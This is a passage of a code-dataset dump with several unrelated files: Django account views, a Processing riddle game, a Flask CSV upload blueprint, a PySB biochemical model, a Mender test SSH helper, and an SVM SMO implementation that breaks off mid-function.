mul_num\n check_num = 11 - (check_num % 11)\n nicknames = [i.nickname for i in User.objects.all()]\n if user.nickname not in nicknames:\n if check_num == user.rrn % 10:\n if 20 - user.rrn // 100000000000 > 0:\n user.age = 20 - user.rrn // 100000000000\n else:\n user.age = 120 - user.rrn // 100000000000\n\n if user.rrn // 1000000 % 10 in (2, 4):\n user.sex = '여'\n user.save()\n auth_login(request, user)\n return redirect('movies:index')\n\n else:\n flag = True\n else:\n nick_flag = True\n\n else:\n form = CustomUserCreationForm()\n\n context = {\n 'form':form,\n 'flag':flag,\n 'nick_flag':nick_flag,\n }\n return render(request, 'accounts/form.html', context)\n\ndef login(request):\n flag = False\n if request.method == 'POST':\n form = AuthenticationForm(request, request.POST)\n if form.is_valid():\n auth_login(request, form.get_user())\n return redirect(request.GET.get('next') or 'movies:index')\n else:\n form = AuthenticationForm()\n context = {\n 'form':form,\n 'flag':flag\n }\n return render(request,'accounts/form.html', context)\n\n@login_required\ndef logout(request):\n auth_logout(request)\n return redirect('movies:index')\n\n@login_required\ndef user_detail(request, pk):\n user = get_object_or_404(User, pk=pk)\n users_list = User.objects.all()\n users = []\n for u in users_list:\n if not u.is_superuser:\n users.append((u, Review.objects.filter(user=u).count(), Comment.objects.filter(user=u).count()))\n users.sort(reverse=True, key = lambda x : (x[1], x[2]))\n\n for idx, u in enumerate(users):\n if u[0] == user:\n rank = idx + 1\n break\n else:\n rank = '운영자'\n\n if rank == '운영자':\n tier = 'gold'\n else:\n if rank <= len(users) * 0.1:\n tier = 'gold'\n elif rank <= len(users) * 0.3:\n tier = 'silver'\n else:\n tier = 'bronze'\n rank = str(rank) + '등'\n\n plus_age = user.age + 1\n reviews = Review.objects.filter(user_id=pk)\n comments = Comment.objects.filter(user_id=pk)\n\n history = 
Userhistory.objects.all().filter(user=user)\n if history:\n record = {}\n for one_history in history:\n history_movie = get_object_or_404(Movie, pk=one_history.movie_pk)\n for genre in history_movie.genres.all():\n if genre in record:\n record[genre] += 1\n else:\n record[genre] = 1\n\n record_list = []\n for key in record:\n record_list.append((record[key], key))\n\n record_list.sort(reverse=True, key = lambda x : x[0])\n favorite_genre = record_list[0][1]\n else:\n favorite_genre = None\n\n context = {\n 'user':user,\n 'reviews':reviews,\n 'comments':comments,\n 'favorite_genre':favorite_genre,\n 'plus_age':plus_age,\n 'tier':tier,\n 'rank':rank,\n }\n return render(request, 'accounts/user_detail.html', context)\n\n\ndef user_update(request):\n if request.method == 'POST':\n form = CustomUserChangeForm(request.POST, instance=request.user)\n if form.is_valid():\n form.save()\n return redirect('movies:index')\n else:\n form = CustomUserChangeForm(instance=request.user)\n context = {\n 'form': form\n }\n return render(request, 'accounts/update.html', context)\n\n\n@login_required\ndef follow(request, pk):\n user = get_object_or_404(User, pk=pk)\n if user != request.user:\n if user.followers.filter(pk=request.user.pk).exists():\n user.followers.remove(request.user)\n request.user.followings.remove(user)\n\n else:\n user.followers.add(request.user)\n request.user.followings.add(user)\n return redirect('accounts:detail', user.pk)\n\n@login_required\ndef delete(request):\n reviews = request.user.review_set.all()\n for review in reviews:\n movie = review.movie\n movie.vote_tot -= review.rank\n movie.vote_count -= 1\n if movie.vote_count:\n movie.vote_average = round(movie.vote_tot / movie.vote_count, 1)\n else:\n movie.vote_average = 0\n movie.save()\n request.user.delete()\n return redirect('movies:index')\n","sub_path":"accounts/.~c9_invoke_oPFKoT.py","file_name":".~c9_invoke_oPFKoT.py","file_ext":"py","file_size_in_byte":5467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"578039296","text":"global x, y, y2\nglobal screen\nglobal obstacles\ntimeElapsed = None\nroom_obstacles = [[50, 50, 410, 195], [900, 50, 250, 165], [50, 580, 480, 170], [110, 320, 280, 90], [940, 545, 5, 200]]\noutdoor_obstacles = [[170, 110, 256, 256], [800, 120, 256, 256], [230, 475, 198, 170], [785, 510, 178, 126]]\nupstairs_obstacles = [[50, 285, 290, 200], [300, 50, 505, 145], [65, 615, 180, 110], [80, 70, 73, 116]]\nx = 650\ny = 650\ny2 = 610\nscreen = 0\n\n\ndef setup():\n #all images for main room\n global img_floor, img_door, img_croppedfloor, img_couch, img_chest, img_desk, img_carpet, img_stairs, img_table\n #all images for outside\n global img_grass, img_tree, img_berry, img_grassCropped, img_grassCropped2, img_grassCropped3, img_picnic\n #characters\n global img_ted_down, img_ted_left, img_ted_down, img_ted_right, img_ted_up\n #all images for bedroom\n global img_bed, img_bookshelf, img_flowerpot, img_bedside\n #image for winning\n global img_winner\n size(1200, 800)\n background(0)\n img_floor = loadImage(\"FloorPixel.png\")\n img_door = loadImage(\"door.png\")\n img_croppedfloor = loadImage(\"FloorPixelCropped.png\")\n img_couch =loadImage(\"couch.png\")\n img_chest = loadImage(\"chest.png\")\n img_desk = loadImage(\"desk.png\")\n img_carpet = loadImage(\"carpet.png\")\n img_stairs = loadImage(\"stairs.png\")\n img_table = loadImage(\"table.png\")\n img_grass = loadImage(\"grass.png\")\n img_tree = loadImage(\"tree.png\")\n img_berry = 
loadImage(\"berry.png\")\n img_grassCropped = loadImage(\"grassCropped.png\")\n img_grassCropped2 = loadImage(\"grassCropped2.png\")\n img_grassCropped3 = loadImage(\"grassCropped3.png\") \n img_picnic = loadImage(\"picnic.png\")\n img_ted_down = loadImage(\"tedDown.png\")\n img_ted_left = loadImage(\"tedLeft.png\")\n img_ted_right = loadImage(\"tedRight.png\")\n img_ted_up = loadImage(\"tedUp.png\")\n img_bed = loadImage(\"bed.png\")\n img_bookshelf = loadImage(\"bookshelf.png\")\n img_flowerpot = loadImage(\"flowerpot.png\")\n img_bedside = loadImage(\"bedside.png\")\n img_winner = loadImage(\"winner.png\")\n\n\ndef draw():\n global screen\n global x, y\n noFill()\n #character\n rect(x, y, 80, 80)\n #main menu\n if screen == 0:\n background(255, 165, 0)\n fill(255)\n main_menu()\n #living room\n if screen == 1:\n background(0)\n character_movement(x, y, room_obstacles)\n room_graphics()\n room_screenchange()\n display_location(x, y)\n character_animation(x, y)\n if keyPressed and key == \"e\":\n screen = 6\n #outside\n if screen == 2:\n character_movement(x, y2, outdoor_obstacles)\n outdoor_graphics()\n outdoor_screenchange()\n display_location(x, y2)\n character_animation(x, y2)\n #bedroom\n if screen == 3:\n background(0)\n character_movement(x, y, upstairs_obstacles)\n bedroom_graphics()\n display_location(x, y)\n bedroom_screenchange()\n character_animation(x, y)\n #how to play\n if screen == 5:\n background(255,165,0)\n textSize(30)\n text(\"Check the funiture for pieces of a riddle,\", 30, 50)\n text(\"Once you've looked at all the pieces find out what the riddle is,\", 30, 90)\n text(\"Choose the correct answer at the chest to win\", 30, 130)\n textSize(30)\n text(\"Back\", 1000, 600)\n if (mouseX >= 1000 and mouseX <= 1050 and mouseY >= 590 and mouseY <= 615 \n and mousePressed):\n screen = 0\n #opened chest \n if screen == 6:\n background(75, 0, 130)\n textSize(40)\n text(\"Choose the correct answer or lose!\", 200, 100)\n text(\"what is the answer to the riddle??\", 205, 150)\n textSize(30)\n text(\"a shadow\", 100, 250)\n if (mouseX >= 50 and mouseX <= 250 and mouseY >= 200 and mouseY <= 400\n and mousePressed):\n screen = 7\n \n text(\"photography film\", 700, 250)\n if (mouseX >= 650 and mouseX <= 850 and mouseY >= 200 and mouseY <= 400\n and mousePressed):\n screen = 10\n \n text(\"a plant\", 100, 650)\n if (mouseX >= 50 and mouseX <= 250 and mouseY >= 600 and mouseY <= 800\n and mousePressed):\n screen = 10\n \n text(\"a moth\", 700, 650)\n if (mouseX >= 650 and mouseX <= 850 and mouseY >= 600 and mouseY <= 800\n and mousePressed):\n screen = 10\n #won game\n if screen == 7:\n import time\n global timeElapsed\n timeElapsed = timeElapsed or millis()\n background(75, 0, 130)\n image(img_winner, 400, 400)\n textSize(50)\n fill(255, 215, 0)\n text(\"WINNER, WINNER!\", 375, 200)\n fill(255)\n if millis() > timeElapsed + 4000:\n screen = 0\n #pre-game\n if screen == 8:\n import time\n global timeElapsed\n timeElapsed = timeElapsed or millis()\n \n background(0)\n \n fill(255)\n textSize(20)\n text(\"What's your name?\", 300, 400)\n \n if millis() > timeElapsed + 2500:\n fill(255)\n textSize(20)\n text(\"Just kidding. 
We don't care.\", 300, 500)\n \n if millis() > timeElapsed + 5000:\n fill(255)\n textSize(20)\n text(\"Your new name is Ted Bundy.\", 300, 600)\n \n if millis() > timeElapsed + 8000:\n timeElapsed = None\n screen = 1\n #lost game\n if screen == 10:\n import time\n global timeElapsed\n timeElapsed = timeElapsed or millis() \n background(186, 29, 29)\n fill(0)\n textSize(50)\n text(\"You Lost >:)\", 450, 400)\n text(\"Try again\", 475, 550)\n fill(255)\n if millis() > timeElapsed + 3000:\n screen = 1\n #piece of riddle \n if screen == 11:\n background(0, 0, 205)\n textSize(50)\n text(\"me. What\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 1\n #piece of riddle \n if screen == 12:\n background(150, 0, 0)\n textSize(50)\n text(\"shines on\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 1\n #piece of riddle \n if screen == 13:\n background(0, 190, 0)\n textSize(50)\n text(\"but I\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 1\n #piece of riddle \n if screen == 14:\n background(0)\n textSize(50)\n text(\"where there\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 1\n #piece of riddle \n if screen == 15:\n background(178,34,34)\n textSize(50)\n text(\"die if\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 3\n #piece of riddle \n if screen == 16:\n background(221, 160, 221)\n textSize(50)\n text(\"only live\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 3\n #piece of riddle \n if screen == 17:\n background(135, 206, 250)\n textSize(50)\n text(\"is light\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 2\n #piece of riddle \n if screen == 18:\n background(212, 175, 55)\n textSize(50)\n text(\"the light\", 500, 550)\n text(\"back\", 50, 50)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 2\n #piece of riddle \n if screen == 19:\n background(230,230,250)\n textSize(50)\n fill(0)\n text(\"I can\", 500, 550)\n text(\"back\", 50, 50)\n fill(255)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 2\n #piece of riddle \n if screen == 20:\n background(218, 165, 32)\n textSize(50)\n fill(0)\n text(\"am I?\", 500, 550)\n text(\"back\", 50, 50)\n fill(255)\n if (mouseX >= 0 and mouseX <= 150 and mouseY >= 0 and mouseY <= 150\n and mousePressed):\n screen = 2\n \ndef room_graphics():\n global obstacles\n global x, y\n image(img_floor, 50, 50)\n image(img_floor, 50, 145)\n image(img_floor, 50, 240)\n image(img_floor, 50, 335)\n image(img_floor, 50, 430)\n image(img_floor, 50, 525)\n image(img_floor, 50, 620)\n image(img_door, 510, 40)\n image(img_croppedfloor, 780, 50)\n image(img_floor, 355, 145)\n image(img_croppedfloor, 780, 240)\n image(img_floor, 355, 335)\n image(img_croppedfloor, 780, 430)\n image(img_floor, 355, 525)\n image(img_croppedfloor, 780, 620)\n image(img_floor, 355, 655)\n image(img_floor, 50, 655)\n image(img_carpet, 200, 100)\n image(img_couch, 50, 
50)\n image(img_chest, 900, 50)\n image(img_desk, 0, 525)\n image(img_stairs, 945, 540)\n image(img_stairs, 945, 640)\n image(img_table, 110, 320)\n fill(0)\n rect(940, 540, 10, 230)\n noFill()\n noStroke()\n for furniture in room_obstacles:\n rect(*furniture)\n noFill()\n #character\n rect(x, y, 60, 0)\n \ndef room_screenchange():\n global x, y\n global screen\n if (x >= 505 and x <= 670 and y >= 45 and y <= 65):\n textSize(15)\n text(\"press i to go outside\", 520, 150)\n if keyPressed:\n if (key == \"i\"):\n screen = 2\n #stairs\n if (x >= 800 and x <= 900 and y >= 600 and y <= 750):\n textSize(15)\n text(\"press x to inspect the stairs\", 760, 540)\n if keyPressed:\n if (key == \"x\"):\n screen = 11\n #chest\n if (x >= 900 and x <= 1050 and y >= 50 and y <= 280):\n textSize(15)\n text(\"press o to open chest\", 700, 250)\n if (keyPressed):\n if (key == 'o'):\n screen = 6\n #couch\n if (x >= 100 and x <= 350 and y >= 50 and y <= 280):\n textSize(15)\n text(\"press x to inspect the couch\", 200, 250)\n if (keyPressed):\n if (key == 'x'):\n screen = 12\n #goldfish\n if (x >= 100 and x <= 350 and y >= 500 and y <= 1050):\n textSize(15)\n text(\"press x to inspect the goldfish\", 300, 550)\n if (keyPressed):\n if (key == 'x'):\n screen = 13\n \n #table \n if (x >= 45 and x <= 395 and y >= 305 and y <= 420):\n textSize(15)\n text(\"press x to inspect the table\", 400, 340)\n if (keyPressed):\n if (key == 'x'):\n screen = 14 \n #upstairs\n if (x >= 950 and x <= 1100 and y >= 620 and y <= 750):\n textSize(15)\n text(\"press i to go upstairs\", 770, 600)\n if keyPressed:\n if (key == \"i\"):\n screen = 3 \n \ndef display_location(x, y):\n textSize(15)\n text(str(x), 10, 20)\n text(str(y), 10, 40)\n \ndef character_movement(playerx, playery, obstacles_ar):\n global x, y, y2\n\n if keyPressed and key == CODED:\n if keyCode == UP and y >= 50:\n y -= 5\n if point_collide(playerx, playery, obstacles_ar) == True:\n y += 5\n if (keyCode == DOWN and y <= 650):\n y += 5\n if point_collide(playerx, playery, obstacles_ar) == True:\n y -= 5\n if screen == 2 and keyPressed and key == CODED:\n if keyCode == UP and y2 >= 50:\n y2 -= 5\n if point_collide(playerx, playery, outdoor_obstacles) == True:\n y2 += 5\n if (keyCode == DOWN and y2 <= 650):\n y2 += 5\n if point_collide(playerx, playery, outdoor_obstacles) == True:\n y2 -= 5\n if (keyCode == LEFT and x >= 50):\n x -= 5\n if point_collide(playerx, playery, obstacles_ar) == True:\n x += 5\n if (keyCode == RIGHT and x <= 1090):\n x += 5\n if point_collide(playerx, playery, obstacles_ar) == True:\n x -= 5\n \ndef character_animation(x, y):\n if keyCode == LEFT:\n image(img_ted_left, x, y)\n elif keyCode == DOWN:\n image(img_ted_down, x, y)\n elif keyCode == UP:\n image(img_ted_up, x, y)\n elif keyCode == RIGHT:\n image(img_ted_right, x, y)\n else:\n image(img_ted_down, x, y)\n \ndef point_collide(playerx, playery, obstacles_ar):\n global x, y, y2\n \n if screen == 2:\n y = y2\n \n player_x1 = x\n player_x2 = x + 60\n player_y1 = y\n player_y2 = y + 60\n\n for furniture in obstacles_ar:\n\n x_coll = False\n y_coll = False\n \n obstical_x1 = furniture[0]\n obstical_y1 = furniture[1]\n obstical_x2 = furniture[0] + furniture[2]\n obstical_y2 = furniture[1] + furniture[3]\n \n if (player_x2 >= obstical_x1) and (player_x1 <= obstical_x2):\n x_coll = True\n \n if (player_y2 >= obstical_y1) and (player_y1 <= obstical_y2):\n y_coll = True\n \n if x_coll is True and y_coll is True:\n return True\n \n return False\n \n\ndef main_menu():\n global screen\n textSize(70)\n 
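    # Title and the two clickable menu entries: \"Play\" jumps to the intro sequence (screen 8), \"How to Play\" to the instructions (screen 5).\n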
text(\"Welcome To Yikes\", 320, 300)\n textSize(50)\n text(\"Play\", 550, 500)\n text(\"How to Play\", 450, 600)\n if (mouseX >= 550 and mouseX <= 650 and mouseY >= 475 and\n mouseY <= 515 and mousePressed):\n screen = 8\n if (mouseX >= 500 and mouseX <= 775 and mouseY >= 575 and mouseY <=615\n and mousePressed):\n screen = 5\n \ndef outdoor_screenchange():\n global screen\n global y\n # tree \n if (x >= 105 and x <= 430 and y2 >= 45 and y2 <= 375):\n textSize(15)\n text(\"press x to inspect\", 430, 205)\n text(\"the tree\", 430, 225)\n if (keyPressed):\n if (key == 'x'):\n screen = 17\n #tree on right \n if (x >= 730 and x <= 1060 and y2 >= 55 and y2 <= 385):\n textSize(15)\n text(\"press x to inspect\", 625, 190)\n text(\"the tree\", 660, 210)\n if (keyPressed):\n if (key == 'x'):\n screen = 18\n #berry farm\n if (x >= 165 and x <= 430 and y2 >= 410 and y2 <= 645):\n textSize(15)\n text(\"press x to inspect\", 255, 450)\n text(\"the berry farm\", 255, 470)\n if (keyPressed):\n if (key == 'x'):\n screen = 19\n #picnic table \n if (x >= 720 and x <= 975 and y2 >= 445 and y2 <= 645):\n textSize(15)\n text(\"press x to inspect picnic table\", 790, 650)\n if (keyPressed):\n if (key == 'x'):\n screen = 20\n #going inside\n if (x >= 505 and x <= 685 and y2 >= 620 and y2 <= 700):\n textSize(15)\n text(\"press o to go inside\", 510, 675)\n if (keyPressed):\n if (key == 'o'):\n screen = 1\n if screen == 1:\n y = 100\n\ndef outdoor_graphics():\n background(135,206,250)\n rect(50, 50, 1100, 700)\n image(img_grass, 50, 50)\n image(img_grass, 519, 50)\n image(img_grass, 50, 355)\n image(img_grass, 519, 355)\n image(img_grassCropped, 50, 450)\n image(img_grassCropped, 519, 450)\n image(img_grassCropped2, 989, 50)\n image(img_grassCropped2, 989, 350)\n image(img_grassCropped3, 989, 655)\n image(img_door, 510, 735)\n image(img_tree, 170, 110)\n image(img_tree, 800, 120)\n image(img_berry, 230, 475)\n image(img_picnic, 785, 510)\n\ndef bedroom_screenchange():\n global screen\n if (x >= 950 and x <= 1100 and y >= 620 and y <= 750):\n textSize(15)\n text(\"press r to go downstairs\", 770, 600)\n if (keyPressed):\n if (key == \"r\"):\n screen = 1 \n # book shelf \n if (x >= 235 and x <= 815 and y >= 45 and y <= 205):\n textSize(15)\n fill(255)\n text(\"press x to inspect the book shelf\", 500, 200)\n if (keyPressed):\n if (key == 'x'):\n screen = 15\n # bed \n if (x >= 45 and x <= 345 and y >= 220 and y <= 490):\n textSize(15)\n text(\"press x to inspect the bed\", 345, 390)\n if (keyPressed):\n if (key == 'x'):\n screen = 16\n \ndef bedroom_graphics():\n image(img_floor, 50, 50)\n image(img_floor, 50, 145)\n image(img_floor, 50, 240)\n image(img_floor, 50, 335)\n image(img_floor, 50, 430)\n image(img_floor, 50, 525)\n image(img_floor, 50, 620)\n image(img_croppedfloor, 780, 50)\n image(img_floor, 355, 145)\n image(img_croppedfloor, 780, 240)\n image(img_floor, 355, 335)\n image(img_croppedfloor, 780, 430)\n image(img_floor, 355, 525)\n image(img_croppedfloor, 780, 620)\n image(img_floor, 355, 655)\n image(img_floor, 50, 655)\n image(img_carpet, 200, 100)\n image(img_bed, 45, 285)\n image(img_bookshelf, 300, 50)\n image(img_stairs, 945, 640)\n image(img_bedside, 65, 615)\n image(img_flowerpot, 80, 70)\n \ndef test_cases():\n assert y >= 50, \"Character out of range\"\n assert y <= 650, \"Character out of range\"\n assert x >= 50, \"Character out of range\"\n assert x <= 1090, \"Character out of range\"\n assert screen < 21, \"No such screen, check buttons for possible misnumbering.\"\n assert screen >= 0, 
\"No such screen, check buttons for possible misnumbering.\"\n\n#test_cases()\n","sub_path":"game.pyde","file_name":"game.pyde","file_ext":"pyde","file_size_in_byte":18084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"461237065","text":"from PIL import Image\n\n\nlast = 608\nox = Image.open('oxygen.png')\ny = 45\nfor x in range(0, last, 7):\n print(chr(ox.getpixel((x, y))[0]), end='')\nprint()\nnext_level = [105, 110, 116, 101, 103, 114, 105, 116, 121]\nfor i in next_level:\n print(chr(i), end='')\n","sub_path":"level7.py","file_name":"level7.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"203865235","text":"import io\nimport time\nfrom logging import getLogger\n\nfrom flask import Blueprint, redirect, render_template, request\n\nfrom app.dbModels import CSVtoDB, commit, stop\n\ncase1 = Blueprint('ex1', __name__, url_prefix='/ex1')\n\nLOG = getLogger(__name__)\n\n@case1.route('/')\ndef index():\n return render_template(\"uploadCSV.html\", case = 1)\n\n@case1.route('/upload', methods = ['POST'])\ndef upload():\n \"\"\"\n API Endpoint to upload the CSV file. It provides a form in which the file to the uploaded can be \n selected and added to the respective database. \n \"\"\"\n try:\n csvFile = request.files.get('data', None)\n fileName = csvFile.filename\n except:\n LOG.error(\"File Not Found!\")\n return redirect(\"/ex1\")\n \n try:\n CSVtoDB(1, fileName)\n except Exception as e:\n LOG.error(e)\n LOG.error(\"Invalid operation!\")\n return redirect('/ex1')\n\n return render_template(\"uploadComplete.html\", case = 1)\n\n@case1.route('/stopUpload', methods=['GET'])\ndef stopUpload():\n \"\"\"\n API Endpoint to stop the upload process. If the stop request is sent before the upload process is complete, the changes made will be \n rolled back and will not be commited to the database. 
\n    \"\"\"\n    \n    stop()\n    return render_template(\"uploadStopped.html\", case = 1)\n","sub_path":"app/exampleCase1.py","file_name":"exampleCase1.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"54815516","text":"from __future__ import print_function\n# import the pysb module and all its methods and functions\nfrom pysb import *\nfrom pysb.integrate import Solver, odesolve\nimport pylab as pl\n\n#units are in mM\n\n#instantiate the model\nModel()\n\n#instantiate species\nMonomer('Glucose')\nMonomer('G6P')\nMonomer('ATP')\nMonomer('ADP')\n\n#instantiate parameters\nParameter('Km_Glucose', 0.377)\nParameter('Km_ATP', 1.84)\nParameter('Vmax', 70.75)\n\n# instantiate rules\n#Rule('Phosphorylation', None >> Glucose(), Km_Glucose)\nRule('Phosphorylation', Glucose >> G6P , Km_Glucose)\nRule('Adenosine_conversion', ATP >> ADP , Km_ATP)\n\n# Initial conditions\nParameter('Glucose_0', 1)\nParameter('ATP_0', 1)\nInitial(Glucose, Glucose_0)\nInitial(ATP, ATP_0)\n\n# instantiate Observables\n\nObservable('obsGlucose', Glucose)\nObservable('obsG6P', G6P)\nObservable('obsATP', ATP)\nObservable('obsADP', ADP)\n\n\n#run simulation\nt = pl.linspace(0, 2000)\n\n\nsolver = Solver(model, t)\nsolver.run()\n\nprint(solver.y[:, 1])","sub_path":"Modelling.py","file_name":"Modelling.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"282638988","text":"#!/usr/bin/python\n# Copyright 2017 Northern.tech AS\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#    https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport time\nimport logging\n\nfrom platform import python_version\nif python_version().startswith('2'):\n    from fabric.contrib.files import *\n    from fabric.api import *\nelse:\n    # User should re-implement: put, run\n    pass\n\n# This is used to remember which docker-compose setup we're currently running.\n# This is for optimization purposes to avoid respawning the docker-compose\n# environment if we don't have to.\nSETUP_TYPE = None\n\nHAVE_TOKEN_TIMEOUT = 60 * 5\nMENDER_STORE = '/data/mender/mender-store'\n\n\ndef put(file, local_path=\".\", remote_path=\".\"):\n    (scp, host, port) = scp_prep_args()\n\n    local(\"%s %s %s/%s %s@%s:%s\" %\n          (scp, port, local_path, file, env.user, host, remote_path))\n\n\ndef ssh_prep_args():\n    return ssh_prep_args_impl(\"ssh\")\n\n\ndef scp_prep_args():\n    return ssh_prep_args_impl(\"scp\")\n\n\ndef ssh_prep_args_impl(tool):\n    if not env.host_string:\n        raise Exception(\"get()/put() called outside of execute()\")\n\n    cmd = (\"%s -C -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" %\n           tool)\n\n    host_parts = env.host_string.split(\":\")\n    host = \"\"\n    port = \"\"\n    port_flag = \"-p\"\n    if tool == \"scp\":\n        port_flag = \"-P\"\n    if len(host_parts) == 2:\n        host = host_parts[0]\n        port = \"%s%s\" % (port_flag, host_parts[1])\n    elif len(host_parts) == 1:\n        host = host_parts[0]\n        port = \"\"\n    else:\n        raise Exception(\"Malformed host
string\")\n\n return (cmd, host, port)\n\n\ndef run(cmd, *args, **kw):\n if kw.get('wait') is not None:\n wait = kw['wait']\n del kw['wait']\n else:\n wait = 60*60\n\n output = \"\"\n start_time = time.time()\n sleeptime = 1\n # Use shorter timeout to get a faster cycle. Not recommended though, since\n # in a heavily loaded environment, QEMU might be quite slow to use the\n # connection.\n with settings(timeout=60, abort_exception=Exception):\n while True:\n try:\n import fabric.api\n output = fabric.api.run(cmd, *args, **kw)\n break\n except Exception as e:\n if time.time() >= start_time + wait:\n raise Exception(\"Could not connect to device\")\n time.sleep(sleeptime)\n # Back off exponentially to save SSH handshakes in QEMU, which\n # are quite expensive.\n sleeptime *= 2\n continue\n finally:\n # Taken from disconnect_all() in Fabric.\n from fabric.state import connections\n if connections.get(env.host_string) is not None:\n connections[env.host_string].close()\n del connections[env.host_string]\n return output\n\n# For now just alias sudo() to run(), since we always run as root. This may need\n# to be changed later.\ndef sudo(*args, **kw):\n run(*args, **kw)\n\n\ndef have_token():\n \"\"\" Make sure the MENDER_STORE file exists after sometime, else fail test \"\"\"\n\n sleepsec = 0\n while sleepsec < HAVE_TOKEN_TIMEOUT:\n try:\n run('strings {} | grep authtoken'.format(MENDER_STORE))\n return\n except Exception:\n sleepsec += 5\n time.sleep(5)\n logging.info(\"waiting for mender-store file, sleepsec: %d\" % sleepsec)\n\n assert sleepsec <= HAVE_TOKEN_TIMEOUT, \"timeout for mender-store file exceeded\"\n","sub_path":"tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"71146024","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport time\nimport random\n\ndef loadDataset(fileName):\n '''\n 说明:读入数据;并转化为np.array\n\n Arguments:\n fileName - 数据文件名\n\n Returns:\n dataMat - 数据集和:X\n labelMat - 数据集合:Y\n '''\n dataMat = []\n labelMat = []\n fr = open(fileName)\n for line in fr.readlines():\n lineArr = line.strip().split('\\t')\n dataMat.append([float(lineArr[0]), float(lineArr[1])])\n labelMat.append(float(lineArr[2]))\n\n dataArr = np.array(dataMat)\n m = np.shape(labelMat)\n labelArr = np.array(labelMat)\n labelArr = labelArr.reshape((m[0],1))\n\n return dataArr, labelArr\n\ndef showDataSet(dataMat, labelMat):\n '''\n Declaration:\n 画出正负样本图形\n\n :param dataMat: 样本X\n :param labelMat: 样本Y\n :return: 无\n '''\n data_plus = []\n data_minus = []\n for i in range(len(dataMat)):\n if labelMat[i] > 0:\n data_plus.append(dataMat[i])\n else:\n data_minus.append(dataMat[i])\n data_plus_np = np.array(data_plus)\n data_minus_np = np.array(data_minus)\n plt.scatter(np.transpose(data_plus_np)[0], np.transpose(data_plus_np)[1])\n plt.scatter(np.transpose(data_minus_np)[0], np.transpose(data_minus_np)[1])\n plt.show()\n\ndef clipAlpha(alpha, H, L):\n '''\n 修剪alpha的数值\n :param alpha: 输入alpha\n :param H: 上限\n :param L: 下限\n :return: 修剪后的 alpha_clipped\n '''\n if alpha>H :\n alpha = H\n if alpha 1e-8)\n _,num = np.shape(index_set)\n w = get_w(alphas, dataArr, labelArr)\n\n b_sum = 0\n for i in range(num):\n index = index_set[0][i]\n b_sum += labelArr[index][0] - np.dot(w, dataArr[index].T)\n b = b_sum/num\n return b\n\ndef showClassifer(dataMat, classLabels, w, b):\n \"\"\"\n 分类结果可视化\n Parameters:\n dataMat - 数据矩阵\n w - 直线法向量\n b - 直线解决\n Returns:\n 无\n \"\"\"\n 
    # plot the sample points\n    data_plus = []  # positive samples\n    data_minus = []  # negative samples\n    for i in range(len(dataMat)):\n        if classLabels[i] > 0:\n            data_plus.append(dataMat[i])\n        else:\n            data_minus.append(dataMat[i])\n    data_plus_np = np.array(data_plus)  # convert to numpy array\n    data_minus_np = np.array(data_minus)  # convert to numpy array\n    plt.scatter(np.transpose(data_plus_np)[0], np.transpose(data_plus_np)[1], s=30, alpha=0.7)  # scatter plot of positive samples\n    plt.scatter(np.transpose(data_minus_np)[0], np.transpose(data_minus_np)[1], s=30, alpha=0.7)  # scatter plot of negative samples\n    # draw the separating line\n    x1 = max(dataMat[:, 0])\n    x2 = min(dataMat[:, 0])\n    a1, a2 = w[0][0], w[0][1]\n    b = float(b)\n\n    y1, y2 = (-b- a1*x1)/a2, (-b - a1*x2)/a2\n    plt.plot([x1, x2], [y1, y2])\n    # mark the support vectors\n    for i, alpha in enumerate(alphas):\n        if abs(alpha) > 1e-8:\n            x, y = dataMat[i]\n            plt.scatter([x], [y], s=150, c='none', alpha=0.7, linewidth=1.5, edgecolor='red')\n    plt.show()\n\ndef smoSimple(dataArr, labelArr, C, toler, maxIter):\n    '''\n    Simplified SMO algorithm: find w and b of the separating hyperplane wx + b = 0\n    :param dataArr: training samples X\n    :param labelArr: training labels Y\n    :param C: a given constant; different values yield different classifiers\n    :param toler: slack tolerance, toler >= 0\n    :param maxIter: maximum number of iterations\n    :return:\n    '''\n    m, _ = np.shape(dataArr)\n    b = 0\n    alphas = 